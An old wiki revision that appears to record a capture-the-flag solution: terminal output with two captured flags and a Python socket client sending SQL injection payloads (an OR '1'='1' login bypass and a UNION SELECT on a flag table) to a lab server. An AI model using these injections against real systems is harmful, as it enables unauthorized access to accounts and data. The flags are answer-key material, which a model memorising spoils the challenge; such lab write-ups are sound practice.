Ceci est une ancienne révision du document !
root@kali:~/Downloads# python client.py [+] Test level1 … Welcome on level 1 !
Welcome b'admin” OR “1”=“1', the flag is 'ESE{n0T_S0_H4rd_R1gHt_!?}'
[+] Test level2 … Welcome on level 2 !
Citation #123 union SELECT * fROM flag: ESE{7d2f9e9beab248febaf5bddffc3a39a4}
Code source : client.py
#encoding: utf-8 import socket import sys # change this if needed HOST = '192.168.1.19' # change this if needed IP = 8096 def create_socket(): try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(1) s.connect((HOST,IP)) except Exception as e: print("Can't open socket !") print(e) sys.exit(1) return s def test_level1(): print("[+] Test level1 ...") s = create_socket() login = 'admin" OR "1"="1' password = 'toto" OR "1"="1" LIMIT "1" OFFSET "2' cmd = "\x01%s\x00%s" % (login,password) s.send(cmd.encode('utf-8')) msg = s.recv(1024) if msg and msg.decode('utf-8').startswith("Welcome"): print(msg.decode('utf-8')) res = s.recv(1024) print(res.decode('utf-8')) else: print("If you called a valid level, notice an admin") s.close() def test_level2(): print("[+] Test level2 ...") s = create_socket() citation = '123 union SELECT * fROM flag' s.send(b"\x02%s" % (citation)) msg = s.recv(1024) if msg and msg.decode('utf-8').startswith("Welcome"): print(msg.decode('utf-8')) res = s.recv(1024) print(res.decode('utf-8')) else: print("If you called a valid level, notice an admin") s.close() if __name__ == '__main__': test_level1() print("") test_level2()